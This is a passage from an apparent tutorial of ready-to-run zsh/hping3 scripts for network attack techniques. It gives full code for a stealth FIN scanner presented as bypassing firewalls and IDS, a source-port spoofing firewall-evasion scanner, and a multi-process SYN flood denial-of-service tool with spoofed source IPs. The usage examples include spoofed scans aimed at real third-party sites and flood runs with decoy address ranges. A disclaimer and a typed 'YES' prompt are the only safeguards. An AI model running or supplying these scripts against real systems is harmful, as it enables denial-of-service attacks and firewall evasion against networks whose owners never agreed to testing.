fi
if grep -q "3389:" "$OPEN_PORTS_FILE" 2>/dev/null; then
echo -e "${YELLOW}⚠ RDP (port 3389) is exposed - use VPN or restrict access${NC}"
fi
if grep -q "3306:\|5432:\|1433:" "$OPEN_PORTS_FILE" 2>/dev/null; then
echo -e "${YELLOW}⚠ Database ports are exposed - should not be publicly accessible${NC}"
fi
fi
echo ""
exit 0
EOF
chmod +x ./common_ports_scan.sh
How to Run:
# Scan default common ports
./common_ports_scan.sh example.com
# Scan web server ports
./common_ports_scan.sh example.com web
# Scan database ports
./common_ports_scan.sh example.com database
# Scan top 100 ports
./common_ports_scan.sh example.com top100
# Scan top 1000 ports with 100 threads
./common_ports_scan.sh example.com top1000 100
# Custom port list
./common_ports_scan.sh example.com "22,80,443,3306,8080"
# Get help
./common_ports_scan.sh --help
Default Ports Included:
– **21**: FTP (File Transfer Protocol)
– **22**: SSH (Secure Shell)
– **23**: Telnet
– **25**: SMTP (Simple Mail Transfer Protocol)
– **53**: DNS (Domain Name System)
– **80**: HTTP (Hypertext Transfer Protocol)
– **443**: HTTPS (HTTP Secure)
– **3306**: MySQL Database
– **3389**: RDP (Remote Desktop Protocol)
– **5432**: PostgreSQL Database
Script 6: Stealth FIN Scanner
Purpose:
Performs FIN scanning, a stealth technique that sends TCP packets with only the FIN flag set. This can bypass some firewalls and intrusion detection systems that only monitor SYN packets.
Create the Script:
cat > ./fin_scan.sh << 'EOF'
#!/bin/zsh
# TCP FIN Scanner using hping3
# Performs stealthy FIN scans to detect firewall rules and port states
# FIN scanning is a stealth technique that may bypass some firewalls
# Requires: hping3 (install with: brew install hping3)
# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
MAGENTA='\033[0;35m'
WHITE='\033[1;37m'
NC='\033[0m' # No Color
# Parse arguments
TARGET="$1"
PORT_SPEC="${2:-80}"
COUNT="${3:-2}"
DELAY="${4:-1}"
# Function to print usage
print_usage() {
local script_name="./fin_scan.sh"
echo "Usage: $script_name <target> [port|port_range] [count] [delay]"
echo ""
echo "Parameters:"
echo " target - Hostname or IP address to scan"
echo " port - Single port or range (e.g., 80 or 80-90)"
echo " count - Number of FIN packets per port (default: 2)"
echo " delay - Delay between packets in seconds (default: 1)"
echo ""
echo "Examples:"
echo " $script_name example.com # Scan port 80"
echo " $script_name example.com 443 # Scan port 443"
echo " $script_name example.com 80-85 # Scan ports 80-85"
echo " $script_name 192.168.1.1 22 3 0.5 # 3 packets, 0.5s delay"
echo ""
echo "FIN Scan Technique:"
echo " - Sends TCP packets with only FIN flag set"
echo " - CLOSED ports respond with RST"
echo " - OPEN ports typically don't respond (stealth)"
echo " - FILTERED ports may send ICMP or no response"
echo ""
echo "Response Interpretation:"
echo " RST received = Port is CLOSED"
echo " No response = Port is likely OPEN or FILTERED"
echo " ICMP received = Port is FILTERED by firewall"
}
# Function to validate port
validate_port() {
local port=$1
if ! [[ "$port" =~ ^[0-9]+$ ]]; then
return 1
fi
if [ "$port" -lt 1 ] || [ "$port" -gt 65535 ]; then
return 1
fi
return 0
}
# Function to get service name
get_service_name() {
local port=$1
# Trim any whitespace from port number
port=$(echo "$port" | tr -d ' ')
# Common services
case $port in
21) echo "FTP" ;;
22) echo "SSH" ;;
23) echo "Telnet" ;;
25) echo "SMTP" ;;
53) echo "DNS" ;;
80) echo "HTTP" ;;
110) echo "POP3" ;;
143) echo "IMAP" ;;
443) echo "HTTPS" ;;
445) echo "SMB" ;;
3306) echo "MySQL" ;;
3389) echo "RDP" ;;
5432) echo "PostgreSQL" ;;
6379) echo "Redis" ;;
8080) echo "HTTP-Alt" ;;
8443) echo "HTTPS-Alt" ;;
27017) echo "MongoDB" ;;
*)
# Try system services
local service=$(grep -w "^[^#]*$port/tcp" /etc/services 2>/dev/null | head -1 | awk '{print $1}')
if [[ -n "$service" ]]; then
echo "$service"
else
echo "Unknown"
fi
;;
esac
}
# Function to perform FIN scan on a single port
scan_port() {
local target=$1
local port=$2
local count=$3
local delay=$4
local service=$(get_service_name "$port")
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${BLUE}Scanning Port:${NC} $port/tcp ($service)"
echo -e "${CYAN}────────────────────────────────────────${NC}"
local responses=0
local rst_count=0
local icmp_count=0
local no_response=0
for i in $(seq 1 $count); do
echo -e "${YELLOW}[→] Sending FIN packet $i/$count to port $port...${NC}"
# Run hping3 with FIN flag
local result=$(hping3 -F -p "$port" -c 1 "$target" 2>&1)
# Analyze response
if echo "$result" | grep -q "flags=RA\|flags=R"; then
echo -e "${RED}[←] RST received - Port $port is CLOSED${NC}"
((rst_count++))
((responses++))
elif echo "$result" | grep -q "ICMP"; then
echo -e "${YELLOW}[←] ICMP received - Port $port is FILTERED${NC}"
((icmp_count++))
((responses++))
elif echo "$result" | grep -q "timeout\|100% packet loss"; then
echo -e "${GREEN}[◊] No response - Port $port may be OPEN or heavily FILTERED${NC}"
((no_response++))
else
# Check for any other response
if echo "$result" | grep -q "len="; then
echo -e "${BLUE}[←] Unexpected response received${NC}"
((responses++))
else
echo -e "${GREEN}[◊] No response - Port $port may be OPEN${NC}"
((no_response++))
fi
fi
# Add delay between packets
if [ "$i" -lt "$count" ] && [ "$delay" != "0" ]; then
sleep "$delay"
fi
done
# Port state analysis
echo ""
echo -e "${CYAN}Port $port Analysis:${NC}"
echo -e " Packets sent: $count"
echo -e " RST responses: $rst_count"
echo -e " ICMP responses: $icmp_count"
echo -e " No responses: $no_response"
# Determine likely port state
if [ "$rst_count" -gt 0 ]; then
echo -e " ${RED}▸ Verdict: Port $port is CLOSED${NC}"
elif [ "$icmp_count" -gt 0 ]; then
echo -e " ${YELLOW}▸ Verdict: Port $port is FILTERED (firewall blocking)${NC}"
elif [ "$no_response" -eq "$count" ]; then
echo -e " ${GREEN}▸ Verdict: Port $port is likely OPEN or silently FILTERED${NC}"
echo -e " ${CYAN} Note: No response to FIN often indicates OPEN port${NC}"
else
echo -e " ${BLUE}▸ Verdict: Port $port state is UNCERTAIN${NC}"
fi
return $responses
}
# Check for help flag
if [[ "$TARGET" == "-h" ]] || [[ "$TARGET" == "--help" ]]; then
print_usage
exit 0
fi
# Check if target is provided
if [ -z "$TARGET" ]; then
echo -e "${RED}Error: No target specified${NC}"
echo ""
print_usage
exit 1
fi
# Parse port specification (single port or range)
START_PORT=""
END_PORT=""
if [[ "$PORT_SPEC" =~ ^([0-9]+)-([0-9]+)$ ]]; then
# Port range (zsh compatible)
START_PORT="${match[1]}"
END_PORT="${match[2]}"
# Validate range
if ! validate_port "$START_PORT" || ! validate_port "$END_PORT"; then
echo -e "${RED}Error: Invalid port range${NC}"
exit 1
fi
if [ "$START_PORT" -gt "$END_PORT" ]; then
echo -e "${RED}Error: Start port must be less than or equal to end port${NC}"
exit 1
fi
elif [[ "$PORT_SPEC" =~ ^[0-9]+$ ]]; then
# Single port
if ! validate_port "$PORT_SPEC"; then
echo -e "${RED}Error: Port must be between 1-65535${NC}"
exit 1
fi
START_PORT="$PORT_SPEC"
END_PORT="$PORT_SPEC"
else
echo -e "${RED}Error: Invalid port specification${NC}"
echo "Use a single port (e.g., 80) or range (e.g., 80-90)"
exit 1
fi
# Validate count
if ! [[ "$COUNT" =~ ^[0-9]+$ ]] || [ "$COUNT" -lt 1 ]; then
echo -e "${RED}Error: Count must be a positive number${NC}"
exit 1
fi
# Validate delay
if ! [[ "$DELAY" =~ ^[0-9]*\.?[0-9]+$ ]]; then
echo -e "${RED}Error: Delay must be a number${NC}"
exit 1
fi
# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
echo -e "${RED}Error: hping3 is not installed${NC}"
echo "Install it with: brew install hping3"
echo ""
echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
echo " /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
exit 1
fi
# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
echo -e "${YELLOW}Note: FIN scan requires root privileges${NC}"
echo "Re-running with sudo..."
echo ""
exec sudo "$0" "$@"
fi
# Calculate total ports
TOTAL_PORTS=$((END_PORT - START_PORT + 1))
# Display header
echo -e "${MAGENTA}╔════════════════════════════════════════╗${NC}"
echo -e "${MAGENTA}║ TCP FIN SCANNER ║${NC}"
echo -e "${MAGENTA}║ (Stealth Scan Technique) ║${NC}"
echo -e "${MAGENTA}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e " ${BLUE}Target:${NC} $TARGET"
if [ "$START_PORT" -eq "$END_PORT" ]; then
echo -e " ${BLUE}Port:${NC} $START_PORT"
else
echo -e " ${BLUE}Port Range:${NC} $START_PORT-$END_PORT ($TOTAL_PORTS ports)"
fi
echo -e " ${BLUE}Packets/Port:${NC} $COUNT"
echo -e " ${BLUE}Packet Delay:${NC} ${DELAY}s"
echo -e " ${BLUE}Scan Type:${NC} TCP FIN (Stealth)"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
# Resolve target
echo ""
echo -e "${YELLOW}[*] Resolving target...${NC}"
TARGET_IP=$(ping -c 1 "$TARGET" 2>/dev/null | grep -oE "\([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\)" | tr -d '()')
if [ -z "$TARGET_IP" ]; then
TARGET_IP="$TARGET"
echo -e "${YELLOW}[*] Could not resolve hostname, using as-is${NC}"
else
echo -e "${GREEN}[✓] Target resolved to: $TARGET_IP${NC}"
fi
# Start time
START_TIME=$(date +%s)
echo ""
echo -e "${GREEN}[+] Starting FIN scan...${NC}"
echo -e "${CYAN}[i] FIN scan sends TCP packets with only the FIN flag set${NC}"
echo -e "${CYAN}[i] This technique may bypass some packet filters and IDS${NC}"
# Results tracking
declare -A PORT_STATES
OPEN_PORTS=""
CLOSED_PORTS=""
FILTERED_PORTS=""
# Main scanning loop
for port in $(seq $START_PORT $END_PORT); do
scan_port "$TARGET_IP" "$port" "$COUNT" "$DELAY"
# Store result based on responses
if [ $? -eq 0 ]; then
# No responses likely means open
OPEN_PORTS="${OPEN_PORTS}$port "
PORT_STATES[$port]="OPEN/FILTERED"
fi
done
# End time
END_TIME=$(date +%s)
DURATION=$((END_TIME - START_TIME))
# Generate summary report
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN} SCAN SUMMARY${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""
# Count results
OPEN_COUNT=$(echo "$OPEN_PORTS" | wc -w | tr -d ' ')
CLOSED_COUNT=$(echo "$CLOSED_PORTS" | wc -w | tr -d ' ')
FILTERED_COUNT=$(echo "$FILTERED_PORTS" | wc -w | tr -d ' ')
echo -e "${BLUE}Scan Results:${NC}"
echo -e " Total Ports Scanned: $TOTAL_PORTS"
echo -e " Likely Open/Filtered: $OPEN_COUNT"
echo -e " Confirmed Closed: $CLOSED_COUNT"
echo -e " Confirmed Filtered: $FILTERED_COUNT"
echo -e " Scan Duration: ${DURATION} seconds"
if [ "$OPEN_COUNT" -gt 0 ]; then
echo ""
echo -e "${GREEN}Potentially Open Ports:${NC}"
for port in $OPEN_PORTS; do
service=$(get_service_name "$port")
echo -e " ${GREEN}▸${NC} Port $port/tcp - $service"
done
fi
# Save report to file
REPORT_FILE="fin_scan_${TARGET}_$(date +%Y%m%d_%H%M%S).txt"
{
echo "TCP FIN Scan Report"
echo "==================="
echo "Target: $TARGET ($TARGET_IP)"
echo "Port Range: $START_PORT-$END_PORT"
echo "Scan Date: $(date)"
echo "Duration: ${DURATION} seconds"
echo "Technique: TCP FIN (Stealth Scan)"
echo ""
echo "Results:"
echo "--------"
echo "Likely Open/Filtered: $OPEN_COUNT"
echo "Confirmed Closed: $CLOSED_COUNT"
echo "Confirmed Filtered: $FILTERED_COUNT"
if [ "$OPEN_COUNT" -gt 0 ]; then
echo ""
echo "Potentially Open Ports:"
for port in $OPEN_PORTS; do
service=$(get_service_name "$port")
echo " Port $port/tcp - $service"
done
fi
} > "$REPORT_FILE"
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${BLUE}[*] Report saved to: $REPORT_FILE${NC}"
echo ""
echo -e "${YELLOW}Important Notes:${NC}"
echo -e "${CYAN}• FIN scanning is a stealth technique${NC}"
echo -e "${CYAN}• No response often indicates an OPEN port${NC}"
echo -e "${CYAN}• RST response indicates a CLOSED port${NC}"
echo -e "${CYAN}• Results may vary based on firewall rules${NC}"
echo -e "${CYAN}• Some systems may not follow RFC standards${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
exit 0
EOF
chmod +x ./fin_scan.sh
How to Run:
# Scan default port 80
./fin_scan.sh example.com
# Scan specific port
./fin_scan.sh example.com 443
# Scan port range
./fin_scan.sh example.com 80-85
# Custom parameters
./fin_scan.sh 192.168.1.1 22 3 0.5
# Quick single packet scan
./fin_scan.sh server.com 80-443 1 0
# Get help
./fin_scan.sh --help
Response Interpretation:
– **No response**: Port likely open (or filtered)
– **RST response**: Port closed
– **ICMP unreachable**: Port filtered
—
Script 7: Source Port Spoofing
Purpose:
Modifies the source port of outgoing packets to bypass firewall rules that allow traffic from specific “trusted” ports like DNS (53) or FTP-DATA (20).
Create the Script:
cat > ./source_port_scan.sh << 'EOF'
#!/bin/zsh
# Source Port Spoofing Scanner using hping3
# Attempts to bypass firewalls that trust certain source ports
# Requires: hping3 (install with: brew install hping3)
# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
MAGENTA='\033[0;35m'
NC='\033[0m' # No Color
# Parse arguments early
TARGET="$1"
DEST_PORT="${2:-80}"
SOURCE_PORT="${3:-53}"
COUNT="${4:-1}"
# Function to print usage
print_usage() {
local script_name="./source_port_scan.sh"
echo "Usage: $script_name <target> [dest_port] [source_port] [count]"
echo ""
echo "Parameters:"
echo " target - Hostname or IP address to scan"
echo " dest_port - Destination port to scan (default: 80)"
echo " source_port - Source port to spoof (default: 53)"
echo " count - Number of packets to send (default: 1)"
echo ""
echo "Common trusted source ports:"
echo " 53 (DNS), 20 (FTP-DATA), 123 (NTP), 67/68 (DHCP)"
echo ""
echo "Examples:"
echo " $script_name example.com # Scan port 80 from source port 53"
echo " $script_name example.com 443 # Scan port 443 from source port 53"
echo " $script_name example.com 80 20 # Scan port 80 from source port 20"
echo " $script_name example.com 80 53 3 # Send 3 packets"
}
# Check for help flag
if [[ "$TARGET" == "-h" ]] || [[ "$TARGET" == "--help" ]]; then
print_usage
exit 0
fi
# Check if target is provided
if [ -z "$TARGET" ]; then
echo -e "${RED}Error: No target specified${NC}"
echo ""
print_usage
exit 1
fi
# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
echo -e "${RED}Error: hping3 is not installed${NC}"
echo "Install it with: brew install hping3"
echo ""
echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
echo " /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
exit 1
fi
# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
echo -e "${YELLOW}Note: Source port scan requires root privileges${NC}"
echo "Re-running with sudo..."
echo ""
exec sudo "$0" "$@"
fi
# Map common source ports to names
declare -A source_services
source_services[53]="DNS"
source_services[20]="FTP-DATA"
source_services[123]="NTP"
source_services[67]="DHCP"
source_services[68]="DHCP"
source_services[88]="Kerberos"
source_services[500]="IKE/IPSec"
SERVICE_NAME=${source_services[$SOURCE_PORT]:-"Custom"}
# Display header
echo -e "${MAGENTA}╔════════════════════════════════════════╗${NC}"
echo -e "${MAGENTA}║ SOURCE PORT SPOOFING SCANNER ║${NC}"
echo -e "${MAGENTA}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e " ${BLUE}Target:${NC} $TARGET:$DEST_PORT"
echo -e " ${BLUE}Source Port:${NC} $SOURCE_PORT ($SERVICE_NAME)"
echo -e " ${BLUE}Packet Count:${NC} $COUNT"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""
echo -e "${YELLOW}[*] Attempting to bypass firewall rules that trust source port $SOURCE_PORT${NC}"
echo -e "${CYAN}[i] Some firewalls allow traffic from 'trusted' source ports${NC}"
echo ""
# Resolve target
echo -e "${YELLOW}[*] Resolving target...${NC}"
TARGET_IP=$(ping -c 1 "$TARGET" 2>/dev/null | grep -oE "\([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\)" | tr -d '()')
if [ -z "$TARGET_IP" ]; then
TARGET_IP="$TARGET"
echo -e "${YELLOW}[*] Could not resolve hostname, using as-is${NC}"
else
echo -e "${GREEN}[✓] Target resolved to: $TARGET_IP${NC}"
fi
echo ""
echo -e "${GREEN}[+] Starting source port spoofing scan...${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
OPEN_COUNT=0
CLOSED_COUNT=0
FILTERED_COUNT=0
for i in $(seq 1 $COUNT); do
echo -e "${CYAN}[→] Sending SYN packet $i/$COUNT from port $SOURCE_PORT...${NC}"
result=$(hping3 -S -p $DEST_PORT -s $SOURCE_PORT -c 1 $TARGET_IP 2>&1)
if echo "$result" | grep -q "flags=SA\|flags=S\.A"; then
echo -e "${GREEN}[✓] Port $DEST_PORT appears OPEN (SYN+ACK received)${NC}"
echo -e "${GREEN} → Source port spoofing may have bypassed filtering!${NC}"
((OPEN_COUNT++))
elif echo "$result" | grep -q "flags=RA\|flags=R"; then
echo -e "${RED}[✗] Port $DEST_PORT appears CLOSED (RST received)${NC}"
((CLOSED_COUNT++))
elif echo "$result" | grep -q "ICMP"; then
icmp_type=$(echo "$result" | grep -oE "ICMP [^,]+" | head -1)
echo -e "${YELLOW}[!] ICMP response received: $icmp_type${NC}"
echo -e "${YELLOW} → Port is likely FILTERED by firewall${NC}"
((FILTERED_COUNT++))
elif echo "$result" | grep -q "100% packet loss\|timeout"; then
echo -e "${YELLOW}[?] No response - Port $DEST_PORT may be FILTERED${NC}"
((FILTERED_COUNT++))
else
# Check for any response
if echo "$result" | grep -q "len="; then
echo -e "${BLUE}[←] Unexpected response received${NC}"
echo "$result" | grep "len=" | head -1
else
echo -e "${YELLOW}[?] No response - Port $DEST_PORT may be FILTERED${NC}"
((FILTERED_COUNT++))
fi
fi
if [ "$i" -lt "$COUNT" ]; then
sleep 0.5
fi
done
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN} SCAN SUMMARY${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""
echo -e "${BLUE}Target:${NC} $TARGET ($TARGET_IP)"
echo -e "${BLUE}Port Scanned:${NC} $DEST_PORT"
echo -e "${BLUE}Source Port Used:${NC} $SOURCE_PORT ($SERVICE_NAME)"
echo ""
if [ "$OPEN_COUNT" -gt 0 ]; then
echo -e "${GREEN}▸ Verdict: Port $DEST_PORT is OPEN${NC}"
echo -e "${GREEN} ✓ Source port $SOURCE_PORT successfully bypassed filtering!${NC}"
echo -e "${YELLOW} ⚠ Warning: Firewall may be misconfigured to trust port $SOURCE_PORT${NC}"
elif [ "$CLOSED_COUNT" -gt 0 ]; then
echo -e "${RED}▸ Verdict: Port $DEST_PORT is CLOSED${NC}"
echo -e "${CYAN} Note: Port responded normally regardless of source port${NC}"
else
echo -e "${YELLOW}▸ Verdict: Port $DEST_PORT is FILTERED${NC}"
echo -e "${CYAN} Note: Source port $SOURCE_PORT did not bypass filtering${NC}"
echo -e "${CYAN} The firewall is properly configured against source port spoofing${NC}"
fi
echo ""
echo -e "${BLUE}Results Summary:${NC}"
echo -e " Open responses: $OPEN_COUNT"
echo -e " Closed responses: $CLOSED_COUNT"
echo -e " Filtered/No response: $FILTERED_COUNT"
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""
echo -e "${YELLOW}Security Notes:${NC}"
echo -e "${CYAN}• Source port spoofing tests firewall trust relationships${NC}"
echo -e "${CYAN}• Some older firewalls trust traffic from DNS (53) or FTP-DATA (20)${NC}"
echo -e "${CYAN}• Modern firewalls should not trust source ports alone${NC}"
echo -e "${CYAN}• This technique is often combined with other evasion methods${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
exit 0
EOF
chmod +x ./source_port_scan.sh
How to Run:
# Basic Examples
./source_port_scan.sh google.com # Default: port 80, source port 53 (DNS), 1 packet
./source_port_scan.sh github.com 443 # Scan HTTPS port with DNS source port
./source_port_scan.sh example.com 80 20 # Use FTP-DATA source port (20)
./source_port_scan.sh cloudflare.com 443 53 5 # Send 5 packets for reliability
# Advanced Examples
./source_port_scan.sh 192.168.1.1 22 123 3 # SSH scan with NTP source port
./source_port_scan.sh internalserver.local 3306 68 2 # MySQL scan with DHCP client port
./source_port_scan.sh api.example.com 8080 1337 3 # Custom source port 1337
# Testing Web Servers
./source_port_scan.sh mywebsite.com 80 53 3 # HTTP with DNS source
./source_port_scan.sh mywebsite.com 443 53 3 # HTTPS with DNS source
# Testing Multiple Trusted Ports on Same Target
./source_port_scan.sh target.com 80 53 2 # DNS source port
./source_port_scan.sh target.com 80 20 2 # FTP-DATA source port
./source_port_scan.sh target.com 80 123 2 # NTP source port
./source_port_scan.sh target.com 80 67 2 # DHCP source port
# Internal Network Testing
./source_port_scan.sh 10.0.1.100 445 53 3 # SMB with DNS source
./source_port_scan.sh 10.0.1.100 3389 53 3 # RDP with DNS source
# Testing Popular Services
./source_port_scan.sh google.com 80 53 2 # Google HTTP
./source_port_scan.sh facebook.com 443 53 2 # Facebook HTTPS
./source_port_scan.sh amazon.com 443 20 2 # Amazon with FTP-DATA source
# Testing DNS Servers
./source_port_scan.sh 8.8.8.8 53 123 2 # Google DNS with NTP source
./source_port_scan.sh 1.1.1.1 53 20 2 # Cloudflare DNS with FTP-DATA source
# Help Command
./source_port_scan.sh --help # Show usage information
./source_port_scan.sh -h # Alternative help flag
Common Trusted Source Ports:
– **53**: DNS – Often allowed through firewalls
– **20**: FTP-DATA – May be trusted for FTP connections
– **123**: NTP – Network Time Protocol, often allowed
– **67/68**: DHCP – Dynamic Host Configuration Protocol
Script 8: SYN Flood Attack (Multi-Process with Source IP Decoy)
Purpose:
Performs multi-process SYN flood attacks for authorized DoS testing. This script can cause significant load – especially when used with decoy options.
Create the Script:
cat > ./syn_flood_attack.sh << 'EOF'
#!/bin/zsh
# Function to generate a random IP from a CIDR block
generate_random_ip_from_cidr() {
local cidr=$1
local ip_base=${cidr%/*}
local cidr_bits=${cidr#*/}
# Convert IP to integer
local ip_parts=(${(s:.:)ip_base})
local ip_int=$(( (ip_parts[1] << 24) + (ip_parts[2] << 16) + (ip_parts[3] << 8) + ip_parts[4] ))
# Calculate host bits and range
local host_bits=$((32 - cidr_bits))
local max_hosts=$((2 ** host_bits - 1))
# Generate random offset within the range
local random_offset=$((RANDOM % (max_hosts + 1)))
# Add offset to base IP
local new_ip_int=$((ip_int + random_offset))
# Convert back to IP format
local octet1=$(( (new_ip_int >> 24) & 255 ))
local octet2=$(( (new_ip_int >> 16) & 255 ))
local octet3=$(( (new_ip_int >> 8) & 255 ))
local octet4=$(( new_ip_int & 255 ))
echo "${octet1}.${octet2}.${octet3}.${octet4}"
}
syn_flood_attack() {
local target=$1
local port=$2
local packet_count=$3
local processes=$4
local source_cidr=$5 # Optional CIDR block for source IP randomization
if [ -z "$target" ] || [ -z "$port" ] || [ -z "$packet_count" ] || [ -z "$processes" ]; then
echo "Usage: syn_flood_attack <target> <port> <packet_count> <processes> [source_cidr]"
echo "Example: syn_flood_attack example.com 80 1000 4"
echo "Example with CIDR: syn_flood_attack example.com 80 1000 4 192.168.1.0/24"
echo ""
echo "WARNING: This is a DoS attack tool!"
echo "Only use on systems you own or have explicit permission to test!"
return 1
fi
echo "=========================================="
echo " SYN FLOOD ATTACK"
echo "=========================================="
echo "Target: $target:$port"
echo "Total packets: $packet_count"
echo "Processes: $processes"
echo "Packets per process: $((packet_count / processes))"
if [ -n "$source_cidr" ]; then
echo "Source CIDR: $source_cidr"
else
echo "Source IPs: Random (--rand-source)"
fi
echo ""
echo "⚠️ WARNING: This will perform a SYN flood attack!"
echo "⚠️ Only use on systems you own or have explicit permission to test!"
echo "⚠️ Unauthorized DoS attacks are illegal!"
echo ""
echo -n "Do you have authorization to test this target? (type 'YES' to continue): "
read confirm
if [[ "$confirm" != "YES" ]]; then
echo "❌ Attack aborted - explicit authorization required"
return 1
fi
local packets_per_process=$((packet_count / processes))
local remaining_packets=$((packet_count % processes))
echo "✅ Starting SYN flood with $processes processes..."
echo "📊 Monitor system resources during attack"
# Create log directory
local log_dir="/tmp/syn_flood_$(date +%Y%m%d_%H%M%S)"
mkdir -p "$log_dir"
# Start background processes
local pids=()
for ((i=1; i<=processes; i++)); do
local current_packets=$packets_per_process
# Add remaining packets to the last process
if [ $i -eq $processes ]; then
current_packets=$((packets_per_process + remaining_packets))
fi
echo "🚀 Starting process $i with $current_packets packets"
(
echo "Process $i started at $(date)" > "$log_dir/process_$i.log"
if [ -n "$source_cidr" ]; then
# Use CIDR block for source IP randomization
echo "Using source CIDR: $source_cidr" >> "$log_dir/process_$i.log"
# Send packets with randomized source IPs from CIDR block
# We'll send packets in smaller batches to vary the source IP
local batch_size=10
local sent=0
while [ $sent -lt $current_packets ]; do
local remaining=$((current_packets - sent))
local this_batch=$((remaining < batch_size ? remaining : batch_size))
local source_ip=$(generate_random_ip_from_cidr "$source_cidr")
hping3 -S -p $port -a $source_ip -c $this_batch --flood $target >> "$log_dir/process_$i.log" 2>&1
sent=$((sent + this_batch))
done
else
# Use completely random source IPs
echo "Using random source IPs" >> "$log_dir/process_$i.log"
hping3 -S -p $port --rand-source -c $current_packets --flood $target >> "$log_dir/process_$i.log" 2>&1
fi
echo "Process $i completed at $(date)" >> "$log_dir/process_$i.log"
echo "✅ Process $i completed ($current_packets packets sent)"
) &
pids+=($!)
done
echo "⏳ Waiting for all processes to complete..."
echo "💡 You can monitor progress with: tail -f $log_dir/process_*.log"
# Wait for all processes and show progress
local completed=0
while [ $completed -lt $processes ]; do
completed=0
for pid in "${pids[@]}"; do
if ! kill -0 $pid 2>/dev/null; then
((completed++))
fi
done
echo "📈 Progress: $completed/$processes processes completed"
sleep 2
done
echo "🎯 SYN flood attack completed!"
echo "📋 Logs saved in: $log_dir"
echo "🧹 Clean up logs with: rm -rf $log_dir"
}
# Check if script is being sourced or executed directly
if [[ "${(%):-%x}" == "${0}" ]]; then
syn_flood_attack "$@"
fi
EOF
chmod +x ./syn_flood_attack.sh
How to Run:
# Basic Usage Syntax:
./syn_flood_attack.sh <target> <port> <packet_count> <processes>
# 1. Test against a local test server (SAFE)
# Send 1000 SYN packets to localhost port 8080 using 4 parallel processes
./syn_flood_attack.sh localhost 8080 1000 4
# 2. Test your own web server
# Send 5000 packets to your own server on port 80 using 10 processes
./syn_flood_attack.sh your-test-server.com 80 5000 10
# 3. Small-scale test
# Send only 100 packets using 2 processes for minimal testing
./syn_flood_attack.sh 127.0.0.1 3000 100 2
# 4. Stress test with more packets
# Send 10000 packets to port 443 using 20 parallel processes
./syn_flood_attack.sh test.example.local 443 10000 20
# 5. Create a random decoy attack using ip addresses from a specified CIDR block. This has the highest potential to cause harm. Authorised use only!
./syn_flood_attack.sh target.com 80 1000 4 192.168.0.0/16
./syn_flood_attack.sh target.com 80 1000 4 10.0.0.0/8
# Parameters:
# <target>: IP address or hostname (localhost, 192.168.1.100, test-server.local)
# <port>: Target port number (80 for HTTP, 443 for HTTPS, 22 for SSH)
# <packet_count>: Total number of SYN packets to send (1000, 5000, etc.)
# <processes>: Number of parallel hping3 processes to use (4, 10, etc.)
Example Output:
./syn_flood_attack.sh localhost 8080 1000 4
==========================================
SYN FLOOD ATTACK
==========================================
Target: localhost:8080
Total packets: 1000
Processes: 4
Packets per process: 250
⚠️ WARNING: This will perform a SYN flood attack!
⚠️ Only use on systems you own or have explicit permission to test!
⚠️ Unauthorized DoS attacks are illegal!
Do you have authorization to test this target? (type 'YES' to continue): YES
✅ Starting SYN flood with 4 processes...
📊 Monitor system resources during attack
🚀 Starting process 1 with 250 packets
🚀 Starting process 2 with 250 packets
🚀 Starting process 3 with 250 packets
🚀 Starting process 4 with 250 packets
⏳ Waiting for all processes to complete...
💡 You can monitor progress with: tail -f /tmp/syn_flood_20250923_114710/process_*.log
Safety Features:
– Explicit authorization confirmation required
– Process monitoring and logging
– Progress tracking with visual indicators
– Automatic log cleanup instructions
Parameters Explained:
**target**: Target hostname/IP address
**port**: Target port number
**packet_count**: Total packets to send
**processes**: Number of parallel processes
Script 9: Comprehensive Network Discovery
Purpose:
Performs comprehensive network discovery combining ICMP and TCP techniques to map active hosts and services across a network range.
Create the Script:
cat > ./network_discovery.sh << 'EOF'
#!/bin/zsh
network_discovery() {
local network=$1
local start_ip=${2:-1}
local end_ip=${3:-254}
local test_ports=${4:-"22,80,443"}
